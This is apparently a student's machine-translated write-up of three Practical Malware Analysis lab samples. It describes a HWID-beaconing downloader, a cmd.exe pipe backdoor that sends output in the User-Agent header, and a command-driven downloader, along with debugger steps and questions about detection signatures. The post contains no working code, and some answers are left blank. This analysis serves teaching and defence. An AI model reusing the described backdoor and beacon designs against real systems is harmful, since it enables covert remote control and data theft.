"Practical Malicious Code Analysis" Experiment - Labs-14

"Practical Malicious Code Analysis" Experiment - Labs-14

Record the experiments in "Malicious Code Analysis Practice", related links:

• Download of e-books

Labs-14-01 Experiment

Sample: Lab14-01.exe

Static analysis:

1. Check the shell - no shell
   
2. View the input table -
   Kernel32.dll: functions such as sleeping, creating and terminating processes, loading library files, etc.
   ADVAPI32.dll: used to retrieve or set system information, obtain the current user name, etc.
   Urlmon.dll: url download file to cache function
   
3. Strings analysis:
   Base64 encoding format string appears, which may be encrypted using base64.
   
   Network resources appear, indicating that malicious programs may request network resources online.
   
4. Carry out preliminary dynamic analysis first

IDA analysis

5. First get the HWID (Hardware Identification) of the current host
   
6. Form the obtained HWID into a string according to the specified method and save it in the variable var_10098
   
7. Concatenate the obtained HWID and user name and save them in the variable var_10160
   
8. Continuing on, the function will first call function sub_4010BB, and then enter an infinite loop, in which the loop body calls function sub_4011A3
   
9. Let's first analyze sub_4010BB. The parameters of this function are exactly the string obtained by concatenating HWID and user name, and an applied first memory address.
   
10. Entering this function for analysis, we found that this function is a typical base64 encryption function, in which the encrypted object is the passed parameter string.
    
11. Therefore, the function sub_4010BB is a base64 encryption function, and the encrypted data is stored in the variable var_10000.
12. Continuing on, the function sub_4011A3 is called in the loop body, and the parameter is the encrypted string.
    
13. Enter this function for analysis.
    (1) This function performs string splicing at the beginning, splicing the encrypted character, its last digit and the domain name string to obtain a network resource address. The spliced ​​string is saved in var_210 .
    
    
    (2) Then the function URLDownloadToCacheFileA will be called to request the network resource and cache it. The cached file name is stored in the ApplicationName variable.
    
    (3) Next, a file will be created to execute the cache.
    
14. At this point, the analysis of the entire malicious program is completed. Now let’s summarize the functions of the malicious program
    (1) Obtain the HWID and user name, and splice them
    (2) Base64 encrypt the spliced ​​string
    (3) Encrypt the encrypted characters Concatenate the string and the specified string to obtain the network resource address
    (4) Access the network resource address to cache the resource, and create a new process execution cache file

Dynamic Analysis

1. Open PM and run the program for monitoring

2. Analyze registry operations
   and modify multiple registry keys under network connections
   

3. Analyzing file operations
   (1) Cab4EA3.tmp and Tar4EA4.tmp files are created and modified in the Temp temporary folder
   
   
   (2) But these files will be deleted
   
   (3) These temporary files are temporary files generated during network access. It will be deleted when the program ends.
    

4. Network operation analysis, network connection with 192.0.78.24
   

Build HTTP service for dynamic analysis

Since the C&C in the experiment could not be connected, we built a local environment for testing; we built an HTTP service for sample analysis because we had doubts about the directory when the function URLDownloadToCacheFileA caches network resources.

5. Use python to create a simple http service,
   
6. Create the directory and file malwareana/index.html in the current user's root directory
   
7. Then open PM for monitoring
8. Open the program with OD, and set breakpoints at 004011F9 and 0040120E, because the time between these two addresses is when the function URLDownloadCacheFileA is called, we need to modify the address of the network resource here; at the same time, record one of the parameters of the URLDownloadCacheFileA function ——Cache directory ApplicationName (address is 0x0011F9C4)
   
9. F8 single step, the network resource address appears
   
10. Trace to the memory address where network resources are stored
    
11. Modify the network resource address in the data window.
    The modified address here is http://localhost:8889/malwareana/index.html (be sure to change the hexadecimal data after html to 0x00 and truncate it as a string) )
    
    
    After modifying the memory content, you need to modify the following data to 0x00h, which is used for string truncation.
    
12. Then continue running the program (F9) in OD. At this time, the program is interrupted at 0040120E. In the data window, track the address of the cache directory ApplicationName - 0x0011F9C4, and obtain the directory of the system's cached network resources.
    
13. PM has monitored related file operations and found that the file index[1].html was created (because index.html already exists in the cache directory)
    
    
    
14. Go to the cache directory and find the cache file, which is the file provided by the local http server.
    

question

1. What networking libraries are used by the malicious code? What are their advantages?
   Answer : The URLDownloadToCacheFileA function is used, which uses the COM interface. When the malicious code uses the COM interface, most of the content in the HTTP request comes from within Windows, and network characteristics cannot be effectively used for targeted detection.
2. What are the information source elements used to construct network signaling, and what conditions will cause signaling to change?
   Answer : The information sent contains the HWID and user name of the host; the HWID is fixed and the user name is variable.
3. Why might an attacker be interested in information embedded in network signaling?
   Answer : The attacker wants to obtain specific users and hosts and carry out targeted attacks in the next step.
4. Does the malicious code use standard Base64 encoding? If not, how is the encoding unusual?
   Answer : It is not the commonly used Base64 encoding, because the common base64 encoding uses "=" for padding at the end when the length is not enough, and this malicious program uses 'a' for padding at the end.
5. What is the main purpose of malicious code?
   Answer : Send the HWID and username of the infected host to the C&C, and then download and run other malicious code from the website
6. What elements in malicious code communications might be effectively detected using network signatures?
   Answer : The domain name characteristics, base64 encoding characteristics and the suffix of the URI in the HTTP request are PNG files.
7. What mistakes might an analyst make when trying to develop a signature for this malicious code?
   Answer :——
8. What signature sets are likely to detect this malicious code (and new variants)?
   Answer :——

Labs-14-02 Experiment

Sample: Lab14-02.exe

Static analysis:

1. Check the shell - no shell
   
2. View the input table - discover other resources
   KERNEL32.dll: Create termination process, copy handle, create pipe, write unique file, etc. Functions
   USER32.dll: Load string
   SHELL32.dll: Execute shell
   WININET.dll: Open URL, network reading File
   MSVCRT.dll:——
   
   
3. View hidden resources - network resource addresses
   
4. Strings analysis -
   Common strings used for base64 encryption appear. It is speculated that base64 may be used for encryption.
   "cmd.exe" appears. It is speculated that cmd may be called to execute malicious commands.
   "http:...127.0.0.1/tenfour.html" appears. It is speculated that Will access network resources
   
5. Carry out preliminary dynamic analysis first

IDA analysis

6. The Main function first loads the string in the resource (the previous dynamic analysis already knows that the string is a network resource address), and then saves it to the Buffer.
   
7. Then assign the string to variable v4, create two pipes at the same time, and use variable v4 as input and output respectively.
   
8. The other end of the pipe is the process information StartupInfo structure. Pipeline communication is achieved by creating a new cmd process.
   
9. That is to say, cmd receives the data of the buffer through the pipe for execution, and then transmits the execution result to the buffer through the pipe.
10. Next, a thread will be created. The address of the thread is StartAddress
    
    (1). Follow the address. The module will read the data of the pipe, then use the function sub_401000 to perform base64 encryption, and save the encrypted data in v3 (2
    
    ) Next, the function sub_401750 is called to operate on the encrypted data. This function has two parameters, one is the encrypted data, and the other is traced back to the original data in the buffer, but there is an offset of 0x14 bytes ( That is, the string of network resources)
    
    (3) Enter the sub_401750 function for analysis. This function uses the encrypted data as the UserAgent field in the HTTP protocol, and then accesses the specified URL.
    
11. Continuing down, the entire logic branches. One branch terminates the process (TerminateThread), and the other branch creates another thread. The starting address of the thread is sub_4015C0
    
    (1) Enter this address for analysis. There is a for loop at this address. In the loop body Continuously use function sub_401800 for network access
    
    (2) The parameters of Sub_401800 are the same as those of the sub_401750 function analyzed earlier. They are also read from the pipeline, and the read offsets are all 0x14h (decimal 20) - the specified URL. , it can be guessed that these two functions should be similar in function. Follow up the function for analysis
    
    (3) In addition to the operation of the sub_401800 function in the loop body, the network data is also cached.
    
12. At this point, the analysis of the entire malicious program is basically over. The pipeline communication model created by the entire malicious program can be simplified to:
    
13. Now summarize the functions of the entire malicious program
    (1) Load string resources
    (2) Create pipes to communicate between processes
    (3) Create a new process to execute cmd.exe
    (4) Create a thread to encrypt data, and then send a network data request
    ( 5) Create a new thread to send another network data request and cache the requested resources

Dynamic Analysis

14. Open PM for monitoring and run the program
15. Analyzed registry operations and found that multiple registries were created
    
16. Analyzing file operations:
    cmd.exe is opened
    
    but there is no file writing operation
    
17. Network operation analysis - sending requests to local 127.0.0.1

question

1. What are the advantages and disadvantages of using IP addresses directly when writing malicious code?
   Answer: I don’t quite understand what it means. Let’s take a look at the reference answer.
   
2. What networking libraries are used by the malicious code? What are the advantages and disadvantages of using these libraries?
   Answer: WinNet library is used. The advantage is that compared with the Winsock API, the operating system can provide more network field elements; the disadvantage is that the network function call of the library needs to provide a hard-coded UserAgent field.
3. What is the source of information for URLs in malicious code signaling? What advantages does this information source offer?
   Answer: Reference answer:
   
4. Which aspect of the HTTP protocol does the malicious code exploit to accomplish its purpose?
   Answer: Use the UserAgent field to send information, and the information is encrypted; remote control and arbitrary command execution are achieved through two pipe communications.
5. What kind of information is transmitted in the initial signaling of the malicious code?
   Answer: The information returned by opening cmd is encrypted.
6. What are the shortcomings in the design of this malicious code communication channel?
   Answer: Reference answer
   
7. Is the encoding scheme for malicious code standard?
   Answer: Custom base64 encoding.
8. How is the communication terminated?
   Answer: Use the keyword exit to terminate the communication. The malicious code will try to delete itself when exiting.
9. What is the purpose of this malicious code? What role might it play in an attacker's toolbox?
   Answer: Simple backdoor.
   

Labs-14-03 Experiment

Sample: Lab14-03.exe is improved on the basis of Lab14-01

Static analysis:

1. Check the shell - no shell
   
2. Analyze the input table -
   KERNEL32.DLL: read and write, create files, create files, load library files, etc.
   WININET.DLL: URL access, network file reading, etc.
   urlmon.dll: URLDownloadtoCacheFileA function downloads files to the cache
   
3. String analysis:
   Base64-like encoding string appears, and it is guessed that base64 may be used for data encryption.
   
   HTTP protocol-related fields appear, and network requests are guessed;
   exe programs appear, and may be executed.
   Network resources appear, and network resources may be requested.
   

IDA analysis

5. The logic of the Main function is relatively simple, mainly a do while loop:
   
6. To analyze the loop body, the function sub_401457 is first called. This function has two parameters, one is the string szUrl and the other is a number; follow up the function for analysis (1)
   Inside the function, the CreateFileA function is first called to open the file 'C :\autobat.exe', and then call sub_401372
   
   (2) Enter function sub_401372. The parameter of this function is the string 'http://www.practicalmalwareanalysis.com/start.htm', a network resource; enter this function to find the function The file 'C:\autobat.exe' will be created and the string 'http://www.practicalmalwareanalysis.com/start.htm' will be written to the file.
   
   (3) Return to function sub_401457, continue on, call the function ReadFile to read the data in the file into the buffer lpBuffer; the file here is the 'C:\autobat.exe' created earlier, which is stored internally The data is exactly the network resource string 'http://www.practicalmalwareanalysis.com/start.htm'.
   
7. Therefore, the function of function sub_401457 is to create a file locally to save the network resource address.
8. Return to the loop body, continue down, call function sub_4011F3 to operate network resources, enter this function,
   
   (1) This function first initializes the HTTP field element, and then accesses network resources according to the incoming URL
   (2) Read from network resources After fetching the data, save it to the Buffer, then match the '<no' string
   
   (3) and then call sub_401000 for further matching
   
   (4) Return the string obtained from the network that meets the matching conditions
9. Continue below and pass the obtained string into function sub_401684
   
   (1) Enter function sub_401684 for analysis. It is found that this function first truncates the string and then performs a switch jump. The condition for the jump is the first letter of the string. Then it is suspicious to guess that this is to perform different operations according to the instructions sent by C&C; the method of each command has been analyzed as follows.
   
   (2) It should be noted that the encryption function part calls the function sub_401147
   
   (3) This function is different from the traditional base64, it uses a custom encoding string
   
10. At this point, the analysis of the entire malicious program is completed.
    
11. Now summarize the functions of the malicious program
    (1) Create a local configuration file
    (2) Send a network request according to the configuration file, in which some HTTP elements have been hard-coded
    (3) Cache the data obtained by the network request and perform string processing Check
    (4) Decrypt the returned data. Different instructions perform different operations, including sleep, redirect (modify local configuration files), download and execute other malicious files, and do not perform any operation nop.

question

1. What are the hardcoded elements in the initial signaling? What elements can be used to create a good network signature?
2. What elements in the initial signaling might be detrimental to network characteristics that are sustainable?
3. How does malicious code obtain commands? What examples in this chapter use a similar approach? What are the advantages of this technology?
4. When malicious code receives input, what checks are performed on the input to determine whether it is a useful command? How does an attacker hide the list of commands that malicious code is looking for?
5. What type of encoding is used for command parameters? How is it different from Base64 encoding? What are the advantages and disadvantages it offers?
6. What commands does this malicious code accept?
7. What is the purpose of this malicious code?
8. This chapter introduces the idea of ​​using independent features to target codes at different positions to increase the robustness of network features. So in this malicious code, which sections of code or configuration files can be targeted to extract network characteristics?
9. What set of network signatures should be used to detect malicious code?

( I was too lazy (¬‿¬) ) Reference answer: